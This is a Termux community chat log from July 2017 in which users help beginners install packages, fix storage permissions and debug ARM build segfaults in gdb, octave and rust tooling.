2017-07-20 00:30:38 live_the_dreams there is way mpd does it
2017-07-20 00:30:45 live_the_dreams there is no microphone support for termux as of yet ….
2017-07-20 00:34:38 fidy_ live_the_dreams: I want to play streaming music, dont care to transmit.
2017-07-20 00:34:56 live_the_dreams oh you want to stream to termux so it plays
2017-07-20 00:35:03 live_the_dreams mpv can do that
2017-07-20 00:37:06 fidy_ live_the_dreams: Thank you.
2017-07-20 09:52:08 frumpylava Does anybody know of any Tips and tricks that might be helpful to a termux beginner? It’s for my workshop on saturday.
2017-07-20 09:53:29 frumpylava I already have termux-fix-shebang
and xdg-open
2017-07-20 10:05:05 live_the_dreams oooo new apt
2017-07-20 10:06:48 frumpylava live_the_dreams: What does new apt do better than old apt?
2017-07-20 10:07:18 live_the_dreams not much
2017-07-20 10:10:08 live_the_dreams but it has a higher version number so questioning it is heresy
2017-07-20 10:11:11 live_the_dreams also tried aptitude but that isn’t going yo happen
2017-07-20 10:50:16 gitter (vishalbiswas) Whaaaay?
2017-07-20 10:57:56 live_the_dreams cwidget
2017-07-20 11:04:09 live_the_dreams i don;t think it compiles with libc++
2017-07-20 11:37:01 gitter (Grimler91) frumpylava: what’s your targeted audience? Beginners who have never even used linux or beginners who has some linux-experience?
2017-07-20 11:38:32 gitter (Grimler91) termux-fix-shebang
(and some info on why it is needed) is essential.
2017-07-20 11:40:02 gitter (Grimler91) pointing people to the termux-wiki and the help section (https://termux.com/help.html) might be good as well
2017-07-20 11:41:23 frumpylava @Grimler it’s mostly adept Linux users, who jave never used Termux.
2017-07-20 11:44:51 frumpylava @Grimler91 You can find my working draft here. (https://glow.li/share/Termux_Workshop.html). It’s the Handout at my workshop. The workshop is about using Linux as your main OS, not just about the basics of Termux. It’s in German though, so I’m not sure if you can read it.
2017-07-20 11:46:10 gitter (Grimler91) Cool, I’ll have a look (don’t know german though :p)
2017-07-20 11:49:24 gitter (Grimler91) Maybe cover the really basic stuff, like how accessing ctrl, alt etc with a soft keyboard?
2017-07-20 11:53:03 rods-tab3 https://translate.google.com/translate?sl=de&tl=en&js=y&prev=_t&hl=en&ie=UTF-8&u=https%3A%2F%2Fglow.li%2Fshare%2FTermux_Workshop.html&edit-text=
2017-07-20 11:56:31 gitter (Grimler91) @frumpylava What’s your punch line with the presentation,
2017-07-20 11:57:50 gitter (Grimler91) (ops), you’ll go through how to get started and stuff (nice job in the handouts), do you have some slides prepared with like what termux is/how it fits in to your linux-as-main-os life?
2017-07-20 11:58:36 rods-tab3 https://termux.com/touch-keyboard.html tells it all
2017-07-20 11:59:10 gitter (Grimler91) @rods-tab3 true, just need to make people aware the page exists
2017-07-20 12:06:51 rods-tab3 iirc also wiki.termux.com
2017-07-20 12:11:26 frumpylava @Grimler91 Yes, this Workshop is after a presentation about termux. I’ll go into all the What is and How I use it there.
2017-07-20 12:11:32 frumpylava Working Draft: https://glow.li/share/Termux_Pr%C3%A4sentation.pdf
2017-07-20 12:16:20 frumpylava It’s going to be a half an hour presentation, and then 1:30 of workshop for those who are more interessted, but not adept enough to figure it all out themselves.
2017-07-20 12:48:41 gitter (Grimler91) File Edit Options Buffers Tools Help
2017-07-20 12:48:41 gitter (Grimler91) Wow, such a nice presentation! Did you create it with beamer? I thought I was good with beamer but that template (nice section-counter!) is amazing!
2017-07-20 12:48:41 gitter (Grimler91) I guess most people here in the channel have different backgrounds and use termux differently. For me (a PhD student) it fits really nicely into my line of work as a sort of linux-on-the-go. Instead of bringing my laptop whenever going somewhere these days, I can bring my tablet & phone and still be able to use all the scientific tools I normally use (python, gnuplot, texlive, …). I’m thinking that if I was in the audience I mi
2017-07-20 12:48:41 gitter fulfill that my linux-laptop can’t do. Maybe it would be good to mention this after the introduction and before going through the packages and apt and stuff
2017-07-20 14:56:07 frumpylava @Grimler91 Thanks. I did create it with beamer (on Termux), altough I can’t take credit for the theme. I did not create it: https://git.honet.ch/vimja/beamer_template. It was actually my very first foray into Latex in general.
2017-07-20 14:56:42 frumpylava Also you’re right. I might restructure the presentation so that reasons for using it is at the very beginning.
2017-07-20 15:09:52 b1nny hello!
2017-07-20 15:10:09 frumpylava b1nny: hi
2017-07-20 15:10:42 b1nny I was wondering, is there a way to get a small pop-up bar with a few keys in Termux, like JuiceSSH has? screenie: https://pbs.twimg.com/media/C8cItnuWsAABH1I.jpg
2017-07-20 15:16:54 frumpylava b1nny: yes.
2017-07-20 15:17:03 b1nny frumpylava: oh! Mind telling me more about that? :)
2017-07-20 15:17:03 frumpylava Open the left drawer and long press the keyboard button
2017-07-20 15:17:28 b1nny holy moly!
2017-07-20 15:19:05 frumpylava if you swipe left on that button bar, you get a nice text input view, that can use advanced keyboard features, like swyping and autocorrect.
2017-07-20 15:19:27 b1nny nice! This is awesome :)
2017-07-20 15:19:41 b1nny sounds like I can get rid of juicessh then
2017-07-20 15:20:37 b1nny wish I could add the arrow keys to the keys bar (for use in vim for example) but hey, this works :D
2017-07-20 15:23:00 frumpylava Is this your screenshot? If you use Swiftkey that has an arrow key bar that you can enable.
2017-07-20 15:23:23 b1nny this is one I found via google, but that’s a good suggestion
2017-07-20 15:24:21 frumpylava An other possibility is to use “Hacker’s Keyboard”, which has all the keys.
2017-07-20 15:27:14 b1nny yeah, hacker’s keyboard is very nice :)
2017-07-20 15:27:25 b1nny the suggestions it provides are not the best though sadly enough
2017-07-20 15:28:37 frumpylava indeed. That’s why I use SwiftKey
2017-07-20 15:29:28 b1nny :) personally not using it anymore since they got acquired by Microsoft
2017-07-20 15:32:38 frumpylava b1nny: Yeah. I’d really like to use an open source Keyboard that has Swiping and good Bilingual support. As soon as I find one that is half as good as SwiftKey I’ll switch.
2017-07-20 15:33:27 b1nny Yup.. Anysoftkeyboard (https://anysoftkeyboard.github.io/) works pretty nicely, but it has the stupidest keyboard layouts possible
2017-07-20 15:34:47 frumpylava Indeed. Also I don’t want to switch between languages, I want it to be able to recognize the language I’m typing like SwiftKey does.
2017-07-20 17:08:11 kst b1nny: For vim, you can use hjkl as directional keys (but not in input mode).
2017-07-20 21:08:53 gitter (mklein994) live_the_dream: any updates on rust for arm?
2017-07-20 21:26:16 live_the_dreams oops
2017-07-20 21:26:52 ParkerR Heh
2017-07-20 21:29:48 gitter (mklein994) Just a heads up; rust is now at 1.19.
2017-07-20 21:37:27 live_the_dreams vish is in charge of rust stuff but im testing a version bump now
2017-07-20 21:55:39 gitter (mklein994) Thanks!
2017-07-20 21:58:48 live_the_dreams also upload ldc package for arm … only builds on arm afaik
2017-07-20 22:04:09 gitter (mklein994) Neat
2017-07-21 01:30:21 live_the_dream_s damn it gmic isn’t working on arm
2017-07-21 01:56:54 gitter (vishalbiswas) live_the_dream_s: updated rustc and cargo
2017-07-21 03:02:55 b1nny kst: I know :) never really got used to those though, maybe I should haha. For now I’ve installed GBoard (which has arrow keys too) and firewalled it, so I hopefully should be fine!
2017-07-21 03:17:31 gitter (cocodevienne) Two questions: First, did someone tag me? Cannot seem to find that particular chat in the Gitter app. Second, how do I go about writing a plugin app for Termux?
2017-07-21 03:17:39 gitter (cocodevienne) @vishalbiswas
2017-07-21 10:36:40 gitter (vishalbiswas) @cocodevienne frumpylava tagged you previously. Thought that you could attend his presentation on Termux tomorrow
2017-07-21 17:11:24 gitter (Grimler91) Does gdb needs to be rebuilt? gdb
followed by run
gives segmentation fault
2017-07-21 18:56:11 gitter (mklein994) @vishalbiswas if I run for example, cargo search racer
, it complains about an invalid Content-Type application/x-git-upload-pack-advertisement
, and fails. Is there anything you can do about it?
2017-07-21 18:56:27 gitter (mklein994) I’m on arn
by the way.
2017-07-21 23:32:43 gitter (vishalbiswas) @mklein994 What version of cargo do you have?
2017-07-21 23:33:27 gitter (mklein994) 0.20.0
2017-07-21 23:40:10 gitter (vishalbiswas) Can you try using this https://drive.google.com/folderview?id=0B8Q4yBRb9PSHcVAxbjhZQmszbVU
2017-07-22 00:02:57 gitter (mklein994) As far as I can tell, nothing changed. :(
2017-07-22 00:05:15 gitter (vishalbiswas) do you have libgit2 installed? strange working for me
2017-07-22 00:06:53 gitter (vishalbiswas) @mklein994 related https://github.com/libgit2/libgit2sharp/issues/1094?
2017-07-22 00:08:53 gitter (mklein994) Yup, sure do. I’ll see if I can figure this out tomorrow.
2017-07-22 00:10:00 gitter (vishalbiswas) @mklein994 can you give me the exact steps to reproduce this?
2017-07-22 00:13:03 gitter (mklein994) So I’m not sure of any environment settings or what have you that might be affecting this (when I rename ~/.cargo
it still happens), but it’s simply running cargo search racer
, which should return a result for rust code completion (it shows up on crates.io). I also have almost all packages installed.
2017-07-22 00:15:03 gitter (mklein994) https://gist.github.com/mklein994/b793b94ea879f9f6bbafd18613da522f
2017-07-22 07:31:28 gitter (ranjith0035) Hii guys am new to termux
2017-07-22 07:39:00 gitter (its-pointless) hello
2017-07-22 07:40:15 gitter (ranjith0035) Hello @its-pointless
2017-07-22 07:40:55 gitter (ranjith0035) Actually wat for this termux app is used for i dont have any idea abt it can any one please explain wat all we can do with this app
2017-07-22 07:40:57 gitter (ranjith0035) ??
2017-07-22 08:05:22 live_the_dream_s runs command line applications from linux on your android device like python ruby
2017-07-22 08:07:09 gitter (ranjith0035) Oh how to install those package ?? In it ??
2017-07-22 08:07:23 live_the_dream_s as well as c,c++ tool chain bash commands
2017-07-22 08:08:17 gitter (ranjith0035) Oh tq bro
2017-07-22 08:08:25 live_the_dream_s apt update
2017-07-22 08:08:25 live_the_dream_s then apt install python
2017-07-22 08:08:27 gitter (ranjith0035) For using these do i need to root my device ??
2017-07-22 08:08:33 live_the_dream_s no
2017-07-22 08:08:56 gitter (ranjith0035) Bro can you say some command to install all
2017-07-22 08:09:25 live_the_dream_s the whole thing is designed to not need root
2017-07-22 08:09:25 gitter (ranjith0035) Termux and linux terminal is those two are same bro ??
2017-07-22 08:09:36 live_the_dream_s basically yeah
2017-07-22 08:10:20 gitter (ranjith0035) Bro it shows unable to locate package ??
2017-07-22 08:10:39 live_the_dream_s apt update; first
2017-07-22 08:10:40 gitter (ranjith0035)
2017-07-22 08:10:40 gitter (ranjith0035) E: Unable to locate package phython
2017-07-22 08:11:14 gitter (ranjith0035) Yup i updated then i gave apt install python
2017-07-22 08:11:46 live_the_dream_s you spelt it wrong
2017-07-22 08:11:47 live_the_dream_s ?
2017-07-22 08:12:23 gitter (ranjith0035) Well yeah i spelt it wrong sorry 😅
2017-07-22 08:12:28 live_the_dream_s E: Unable to locate package phython
2017-07-22 08:12:28 live_the_dream_s apt list should give you the list
2017-07-22 08:13:00 gitter (ranjith0035) Thanks a lot @TermuxBot
2017-07-22 08:13:33 gitter (ranjith0035) Bro and how to install java and c++
2017-07-22 08:14:03 gitter (ranjith0035)
2017-07-22 08:14:03 gitter (ranjith0035) E: Unable to locate package java
2017-07-22 08:14:30 live_the_dream_s java isn’t working yet
2017-07-22 08:14:30 live_the_dream_s apt install clang should give you clang++ compiler
2017-07-22 08:15:22 gitter (ranjith0035) Yeah bro really termux is soo cool
2017-07-22 08:15:30 gitter (ranjith0035) Hope ill lear a lot frm it
2017-07-22 08:16:03 gitter (ranjith0035) And please share more information abt termux i need to learn a lot of things in it
2017-07-22 08:16:16 gitter (ranjith0035) Tq @TermuxBot for helping me bro
2017-07-22 09:37:24 fidy can anyone tell me how to grant permissions to my sdcard? mpv fails out because of permissions just curious if there’s a known fix.
2017-07-22 09:42:00 kb9tui ood morning. i am a new user to termux.
2017-07-22 10:39:48 gitter (mklein994) fidy: permissions are a tricky thing in Android, because of how Android separates apps from each other. If you run termux-setup-storage
, have a look around ~/storage
to see the symlinks it creates.
2017-07-22 10:40:52 gitter (mklein994) I have no problem writing to /sdcard
(internal storage), and for external in ~/storage/external-1
.
2017-07-22 10:50:07 gitter (StarRider) I am not able to locate my .ssh folder in my phone.
2017-07-22 10:52:25 gitter (StarRider) I newly created an ssh key.But its not in folders as its shown in the termux terminal
2017-07-22 10:53:09 gitter (StarRider) Com.termux is the missing folder.
2017-07-22 10:53:12 gitter (StarRider) Pls help
2017-07-22 11:44:40 gitter (cocodevienne) Ohhh… @vishalbiswas
2017-07-22 11:46:16 gitter (cocodevienne) Right, where was it? @frumpylava @vishalbiswas Is there a video online somewhere? Woulr have loved to attend, I’ve just been traveling a lot lately. What is this I hear? Do we have Rust for Termux?
2017-07-22 11:46:52 gitter (vishalbiswas) @cocodevienne not in termux official repos. use its-pointless’ repo for rustc
2017-07-22 12:46:19 frumpylava @cocodevienne It was in Schaffhausen Switzerland. There is currently a hacker camp here. There will be a video.
2017-07-22 13:40:19 gitter (ranjith0035) How to run a. C++ prog in termux guys ?m
2017-07-22 13:41:46 BrainDamage some way you run in the rest of the computers, you have to compile it firt
2017-07-22 13:41:48 BrainDamage first*
2017-07-22 13:42:21 BrainDamage and how you compile depends on how the authors set it up, look for instructions, they are generally shipped along the source
2017-07-22 16:02:48 kb9tui ood afternoon all
2017-07-22 16:02:55 kb9tui good
2017-07-22 17:14:42 fidy i need to access my sdcard from termux but i keep getting permission denied.
2017-07-22 17:16:27 gitter (Grimler91) fidy: have you run termux-setup-storage
and then looked in ~/storage as mklein994 suggested above?
2017-07-22 19:22:48 skylog hello
2017-07-22 19:27:46 SkyLog Olá
2017-07-22 19:29:16 SkyLog Systemdownloading
2017-07-22 19:29:51 SkyLog Olá
2017-07-22 19:35:07 fidy hey all. I’ve asked before but missed any possible replies. How do I grant permissions for termux to my sdcard?
2017-07-22 19:39:51 gitter (Grimler91) Try running termux-setup-storage
and then looking in the folder ~/storage
2017-07-22 19:40:35 fidy gitter: Thanks, I’ll give it a shot.
2017-07-22 19:43:54 fidy gitter: That did the trick, is this setup required with each run?
2017-07-22 19:48:54 rod-yolo no
2017-07-22 19:48:55 gitter (Grimler91) No, only once!
2017-07-22 19:51:34 fidy Thank you everyone.
2017-07-22 20:18:21 fidy You guys know everything. What temperature is chicken considered to be properly cooked.
2017-07-22 20:22:19 travisfw 160 F like everything else
2017-07-22 20:23:46 travisfw for at least a minute or more
2017-07-22 20:42:29 fidy travisfw: Yep, thats everything.
2017-07-22 21:21:31 rods-tab3 how much storage space does /data/apps/com.termux occupy ?
2017-07-22 21:29:00 sdrausty rods-tab3: $ du -hs /data/apps/com.termux
2017-07-22 21:29:00 sdrausty du: cannot access ‘/data/apps/com.termux’: No such file or directory
2017-07-22 21:34:23 rods-tab3 yea you need to be root to access /data/apps
2017-07-22 21:35:51 sdrausty I’ll pass
2017-07-22 22:07:53 gitter (mklein994) sdrausty: don’t you mean /data/data/com.termux/files
?
2017-07-22 22:09:03 gitter (mklein994) Or do you want to know how much space Termux is taking up? ‘Cause that’s in app settings, like any other app.
2017-07-22 22:22:11 sdrausty mklein994: 19G /data/data/com.termux/files
2017-07-22 22:38:46 rods-tab3 no, just wanted /data/apps/com.termux space used
2017-07-22 22:42:19 rods-tab3 under settings/app/termux/storage it says APP 208kB – guess thats it
2017-07-22 23:46:48 gitter (vishalbiswas) Thats the size of the apk
2017-07-22 23:53:40 rods-tab3 whats then the size of /data/apps/com.termux ?
2017-07-23 00:27:28 live_the_dream_s oh well that is weird
2017-07-23 00:27:28 live_the_dream_s gmic on arm needs to link against compiler_rt
2017-07-23 00:27:28 live_the_dream_s even though its cross compiling and it shouldn’t be available
2017-07-23 02:22:33 Auxilus @vishalbiswas @fornwall looks like metasploit-aggregator is broken , also there might be some problems with the grpc
2017-07-23 02:23:03 Auxilus i am getting this error while using msfdb :
2017-07-23 02:23:14 gitter (Auxilus) `Creating configuration file in /data/data/com.termux/files/home/metasploit-framework/config/database.yml
2017-07-23 02:23:14 gitter (Auxilus) Creating initial database schema
2017-07-23 02:23:14 gitter (Auxilus) rake aborted!
2017-07-23 02:23:14 gitter (Auxilus) [full message: https://gitter.im/termux/termux?at=597440d24bcd78af56d8b227]
2017-07-23 04:20:00 gitter (bitcoinmeetups) Hello guys. How are you? What is the best tool for encrypting folders in Termux? I have tried Scrypt already but I was not sold on it.
2017-07-23 06:52:50 gitter (vishalbiswas) @mklein994 Do u have 0.26 version of libgit2 installed?
2017-07-23 06:53:06 gitter (vishalbiswas) I think it was introduced in that version.
2017-07-23 06:53:23 gitter (vishalbiswas) I have 0.25 and its working fine
2017-07-23 07:15:10 live_the_dream_s or i screwed up rustc compile
2017-07-23 07:15:11 live_the_dream_s of which im testing that theory
2017-07-23 07:45:42 live_the_dream_s im getting that error with libgit2 0.25
2017-07-23 07:55:56 u0_a146 good morning all.
2017-07-23 07:58:41 u0_a146 wx here in IN warm and cloudy.
2017-07-23 07:59:53 u0_a146 just got termux on my android.
2017-07-23 08:02:53 u0_a146 running curl,htop and irssi and elinks
2017-07-23 08:03:27 u0_a146 elinks sucks on a small android.
2017-07-23 08:05:00 live_the_dream_s make text small and put your face close to the screen….
2017-07-23 08:05:00 live_the_dream_s no don’t do that
2017-07-23 08:14:23 gitter (vishalbiswas) live_the_dream_s: did you version bumped them or used my latest commit?
2017-07-23 08:15:09 live_the_dream_s use your commit
2017-07-23 08:15:16 live_the_dream_s just did one from scratch …
2017-07-23 08:15:20 live_the_dream_s rustc
2017-07-23 08:15:25 live_the_dream_s same issue
2017-07-23 08:16:11 live_the_dream_s warning: spurious network error (2 tries remaining): [12/-1]
2017-07-23 08:17:29 gitter (vishalbiswas) I’m working through libgit2 code
2017-07-23 08:17:45 gitter (vishalbiswas) That’s a smart git client header
2017-07-23 08:18:14 live_the_dream_s vish could you do a strace of working arm for comparison?
2017-07-23 08:27:10 gitter (vishalbiswas) live_the_dream_s: https://drive.google.com/file/d/0B8Q4yBRb9PSHY09iV3RVVF90aXM/view?usp=drivesdk
2017-07-23 08:34:40 live_the_dream may not be git ssl issue
2017-07-23 08:35:29 live_the_dream might be ssl
2017-07-23 09:01:19 gitter (mklein994) Yeah, I have libgit2 0.26.0 installed. How do I install a specific version with apt?
2017-07-23 09:04:03 live_the_dream may not even help mk
2017-07-23 09:04:16 live_the_dream in fact it probably won’t i have already tested
2017-07-23 09:22:46 gitter (mklein994) Alright, thanks for trying.
2017-07-23 10:07:39 fidy Morning all.
2017-07-23 12:02:11 gitter (vishalbiswas) frumpylava: how did the presentation go? Videos?
2017-07-23 13:21:03 m4sk1n why there’s no simple green on black color scheme in termux?
2017-07-23 14:50:43 gitter (mklein994) m4sk1n: it’s really easy to create that scheme. Just base it off of “White on Black”.
2017-07-23 15:08:36 m4sk1n but it would be great to have this theme, a lot of people would use it XD
2017-07-23 15:08:50 m4sk1n you can’t be real hacker without ‘green on black’
2017-07-23 15:34:11 gitter (mklein994) Just like running cmatrix
means your a master H@X0R who can hack the mainframe… Anyway, just set your colors heme to “White on Black” and see what ~/.termux/colors.properties
has. It’s really easy, unless the command line is new to you.
2017-07-23 15:45:01 rods-tab3 Real hackers are Goth and only use the Black on Black theme.
2017-07-23 16:57:45 rods-tab3 IEEE Spectrum released their fourth interactive ranking of programming languages this week, and Python has earned the top spot, nudging out C and Java, which took second and third place respectively. http://spectrum.ieee.org/computing/software/the-2017-top-programming-languages
2017-07-23 17:26:52 frumpylava @vishalbiswas. It went fairly well. It attracted quite a few people (considering the size of the camp). After the presentation I helped a few people with the basics of Termux at a workshop. Yes, there is a video, but you’ll probably not understand me.
2017-07-23 17:27:27 frumpylava @vishalbiswas: https://media.ccc.de/v/zeteco-59-termux_als_betriebssystem
2017-07-23 18:20:56 sdrausty frumpylava: Congratulations:)
2017-07-23 19:18:24 live_the_dream hmm something is going very strangely with setup
2017-07-23 19:19:04 live_the_dream time to redo everything again
2017-07-23 22:13:02 rods-tab3 18 July 2017 – BusyBox 1.27.1 (stable) – termux bb says 1.26.2 ??
2017-07-23 22:28:43 rods-tab3 also ash and hush missing in termux busybox ??
2017-07-23 22:30:02 rods-tab3 yabb – http://www.barebox.org/
2017-07-23 22:35:17 live_the_dream oh yeah mpd is at 0.20.9
2017-07-23 23:19:30 gitter (vishalbiswas) frumpylava: was hoping, there would be subtitle
2017-07-24 00:23:28 gitter (vishalbiswas) nobody noticed that neovin (neovim) fail?
2017-07-24 00:50:38 live_the_dream build or the binary?
2017-07-24 00:53:12 gitter (vishalbiswas) live_the_dream: talking about frumpylava’s presentation
2017-07-24 00:53:41 live_the_dream oh
2017-07-24 05:46:00 endre hi there
2017-07-24 09:30:18 live_the_dream damn it i can get octave to work relatively easy om aarch64 but segfaults om arm
2017-07-24 09:58:14 branau Hi everyone! I posted on Google+ a couple weeks ago about helping out but I was in wedding-prep mode and just got back from my honeymoon. Now that I’m back in the terminal, I’d love to chip in :) I work primarily as a web and Android dev though I’d love to get better at C. Any easy/quick-fix tasks I could take a look at to start getting my hands dirty? :)
2017-07-24 10:49:09 gitter (vishalbiswas) branau: you can look into the github issues, especially for termux-packages
2017-07-24 11:29:28 branau vishalbiswas: Thanks for the tip, I’ll run through some of the issues and see what I can find :) Do you have any sort of organization regarding confirming issues and assigning them? I didn’t see any contributors documentation for the termux-packages repo
2017-07-24 11:47:17 Benl90 hello, I have question, about termux, why termux can’t accept ‘ll’ code like on linux? like ls -l or whatever we call it.
2017-07-24 11:49:48 Benl90 Why I should use ls -l when ll is available across linux terminal, other I means.. any idea or help please? Thanks
2017-07-24 11:51:16 rods-tab3 alias ll=ls -l
2017-07-24 11:51:38 Benl90 with tsu or not?
2017-07-24 11:51:52 Benl90 rods-tab3: Or everytime when I start termux?
2017-07-24 11:52:28 Benl90 rods-tab3: bash not found?
2017-07-24 11:53:27 Benl90 oh I get it, with ‘’
2017-07-24 12:04:22 Benl90 is there anyway to make bashrc global for the alias rods-tab3 ?
2017-07-24 12:08:28 Benl90 oh I get it, sorry I just set it on bash.bashrc, thanks for helping me
2017-07-24 12:37:22 gitter (vishalbiswas) branau: issues are labelled in that repository. bug-reports and package requests are most interesting. You can also look for “help wanted” label
2017-07-24 12:38:26 gitter (vishalbiswas) live_the_dream_s: are you sure you tested libgit2 v0.25.1? Because I just upgraded to v0.26.0 and started getting that error
2017-07-24 12:51:38 gitter (Grimler91) Ben190: you can edit ~/.bashrc instead of $PREFIX/etc/bash.bashrc, otherwise your changes will be overridden on a bash upgrade.
2017-07-24 12:51:51 gitter (Grimler91) Benl90*
2017-07-24 15:20:50 s1ege Hello
2017-07-24 17:37:47 rods-tab3 termux:styling update
2017-07-24 17:39:57 rods-tab3 still no busybox update to 1.27.1
2017-07-24 19:23:36 gitter (excellproj) Hello! What mine need to build a package Mono (http://mono-project.com) for termux? Thank!
2017-07-24 19:35:58 fornwall frumpylava: nice presentation!
2017-07-24 19:36:00 fornwall cd
2017-07-24 19:48:12 live_the_dream fornwall gdb is segfaulting on arm
2017-07-24 19:50:40 fornwall live_the_dream: when running ‘gdb’ directly, or do you actually need to debug something?
2017-07-24 20:01:22 live_the_dream so yeah any command just like entering l segfaults
2017-07-24 20:01:22 live_the_dream any command that doesn’t exist …
2017-07-24 20:02:35 fornwall aha, interesting
2017-07-24 20:03:37 live_the_dream segfaulting the same way in octave which is why i went full stock playstore from termux.net found something doing the same thing
2017-07-24 20:04:40 live_the_dream 3 devices showing same behaviour …
2017-07-24 20:05:33 live_the_dream looks like an io issue
2017-07-24 20:05:39 fornwall aha, same way in octave? I guess readline is a suspect then!
2017-07-24 20:06:26 live_the_dream searching current directry for file
2017-07-24 20:06:38 live_the_dream might also be related to the rustc bit we were having earlier
2017-07-24 23:32:43 gitter (vishalbiswas) from libgit2-rs Readme: Currently this library requires libgit2 0.25.1
2017-07-24 23:33:48 gitter (vishalbiswas) I guess will need to let cargo build libgit2 then
2017-07-24 23:46:15 live_the_dream the issue onky exists on arm vish
2017-07-25 01:06:22 live_the_dream i wonder if octsce and gdb have same bug as gmic because i found a horrible hack to get it to work
2017-07-25 01:45:01 live_the_dream oh yeah it is the same bug
2017-07-25 01:56:11 live_the_dream and its such hack fix …
2017-07-25 02:18:51 ExcellProj Hello! What mine need to build a package Mono (http://mono-project.com) for termux? Thank!
2017-07-25 11:46:55 gitter (vishalbiswas) live_the_dream: maybe we should add compiler_rt to the repos
2017-07-25 12:15:18 fidy I there a default directory for termux and the packages it installs?
2017-07-25 12:23:07 gitter (vishalbiswas) fidy: ?
2017-07-25 12:39:50 traverseda fidy, you might be looking for $PREFIX ? Which is generally at /system/ ?
2017-07-25 15:40:48 fidy Hey all, i know I’ve asked already so I’m sorry for repeating. Is there a default location packages rc files are stored too?
2017-07-25 18:10:08 live_the_dream don’t think its neccesary as yet @vishalbiswas . we could add a symlink or aomething…
2017-07-25 19:41:38 live_the_dream still cant get cargo to work vishalbiswas
2017-07-25 23:21:40 gitter (vishalbiswas) fidy: they are installed in $PREFIX or /data/data/com.termux/files/usr
2017-07-25 23:28:52 gitter (vishalbiswas) live_the_dream: you mean with 0.25.1?
2017-07-25 23:29:42 live_the_dream nah at all
2017-07-25 23:29:51 gitter (vishalbiswas) ?
2017-07-25 23:30:23 live_the_dream on arm
2017-07-25 23:30:23 live_the_dream works fine on aarch64
2017-07-25 23:31:06 gitter (vishalbiswas) libgit2 >0.25.1 has api breaking changes, should break for all arches, strange
2017-07-25 23:34:49 gitter (vishalbiswas) how do I cross build crates from git? https://github.com/alexcrichton/git2-rs/commit/4f682bd3a4f7ef0c6546bd9f91e1afe574e24d40
2017-07-26 03:15:41 gitter (vanvictorlim_twitter) What are the requirements for Termux installation? Is it not compatible with android kitkat v 4.4.2 (unrooted)?
2017-07-26 03:16:13 frumpylava @vanvictorlim_twitter Android >=5 is required.
2017-07-26 03:19:43 gitter (vanvictorlim_twitter) @frumpylava No backwards compatibility
2017-07-26 03:20:20 gitter (vanvictorlim_twitter) ..in the near future?
2017-07-26 03:20:39 gitter (vanvictorlim_twitter) @frumpylava Thanks anyways.
2017-07-26 04:58:33 StewieAndro My location: Los Angeles, United States
2017-07-26 06:46:33 live_the_dream fornwall see my horrible hack for ‘fixing’ gdb?
2017-07-26 09:33:06 fornwall live_the_dream: #1159? so that fixes the segmentation fault when issuing any command that gdb does not recognize?
2017-07-26 10:15:18 live_the_dream yes…
2017-07-26 10:17:01 live_the_dream its what fixed octave and gmic for me
2017-07-26 10:17:35 fornwall interesting :). have you found any information what this problem is about?
2017-07-26 10:24:08 live_the_dream im about to go sleep .. but anyeay
2017-07-26 10:26:24 live_the_dream not really its likelu to do with something low level
2017-07-26 10:27:11 live_the_dream tslk bout it tommorow
2017-07-26 10:28:22 fornwall live_the_dream: ok, catch you later!
2017-07-26 14:06:55 CruX Hello
2017-07-26 15:04:30 gitter (ackalker) Hm, discovered something strange with Termux running in the Android Emulator:
2017-07-26 15:04:30 gitter (ackalker)
2017-07-26 15:04:30 gitter (ackalker) When I move my mouse scroll wheel (yeah I know that Android doesn’t normally support mice) just a tiny little bit, the text scrolls in huge jumps.
2017-07-26 15:04:30 gitter (ackalker) [full message: https://gitter.im/termux/termux?at=5978e7bec101bc4e3ac298ab]
2017-07-26 15:06:16 gitter (ackalker) emulator @Pixel_C_API_23
is what I use to start the emulator. Android Studio etc. updated to latest version in Canary channel.
2017-07-26 19:35:10 live_the_dream okay fornwall to get an idea of what is going on try one of the 2 steps without the other…. i think some errors and issues on ndk-android repo might be the same thing
2017-07-26 19:37:13 fornwall live_the_dream: great! I’ve read them as well, seems to be with stack unwinding, which c++ uses for exceptions
2017-07-26 19:37:14 fornwall right?
2017-07-26 19:37:26 live_the_dream yeah
2017-07-26 19:37:31 fornwall where libc++ seems to need libunwind.a, not the libgcc.a
2017-07-26 19:37:54 fornwall (at least on 32-bit arm)
2017-07-26 19:39:12 live_the_dream but i don’t know if that fixes evrrything
2017-07-26 19:40:50 fornwall this seems to cause #1163, “mosh segfaults after each connection loss”, on 32-bit arm as well
2017-07-26 19:43:18 live_the_dream what im doing seems to work around the issue
2017-07-26 19:44:19 live_the_dream going to get coffee …
2017-07-26 19:45:29 fornwall I’m trying out a change that seems to work
2017-07-26 19:45:49 fornwall it uses the link wrapper from the issue https://android-review.googlesource.com/#/c/389852/
2017-07-26 19:46:23 fornwall to add –exclude-libs,libgcc.a as a linker flag, which should avoid symbols from libgcc.a being exported
2017-07-26 19:47:25 live_the_dream i tried something like thst on octsve and libm.so stsrting complaining
2017-07-26 19:47:27 fornwall and also sets up $PREFIX/lib/libstdc++.so as a linker script, containing ‘INPUT(-lunwind -lc++_shared)’, instead of being a symlink to libc++_shared.so, on arm
2017-07-26 19:49:24 live_the_dream like unwind call in gdb
2017-07-26 19:49:32 live_the_dream but that could be my tool chain
2017-07-26 19:50:25 live_the_dream im only using gfortran though
2017-07-26 19:50:25 live_the_dream so clang + gfortran
2017-07-26 19:52:48 fornwall I’ll push my changes in a minute so you can try it out
2017-07-26 19:53:28 live_the_dream when they said libc++ isn’t stable they were right but i think it was the right call to use new lib anyway
2017-07-26 20:09:06 fornwall live_the_dream: just pushed a commit
2017-07-26 20:09:26 fornwall can you update to the new 8.0-1 version of gdb and confirm that it works better now?
2017-07-26 20:09:54 fornwall when building yourself, you probably need to run ./clean.sh to get a clean build setup
2017-07-26 20:27:01 live_the_dream you might want to add a line deleting notmuch.h from includes before building it since rsidual notmuch.h breaks build
2017-07-26 20:28:01 live_the_dream no need for a new rev number its just a convienence
2017-07-26 20:33:03 fornwall ah, if the already installed notmuch.h is from an older version?
2017-07-26 20:36:09 live_the_dream yeag
2017-07-26 21:10:44 live_the_dream k gdb works can confirm building it here
2017-07-27 00:55:47 gitter (vishalbiswas) hi
2017-07-27 01:00:30 live_the_dream ello
2017-07-27 01:49:41 sdrausty vishalbiswas: Hi. I finally am modifying https://github.com/sdrausty/buildAPKs as you suggested. Thanks for the suggestion.
2017-07-27 02:21:59 gitter (rnauber) @fornwall is there a specific reason, why termux-boot is not yet on fdroid?
2017-07-27 03:18:25 sdrausty rnauber: I tried building it on device: 5 problems (4 errors, 1 warning)
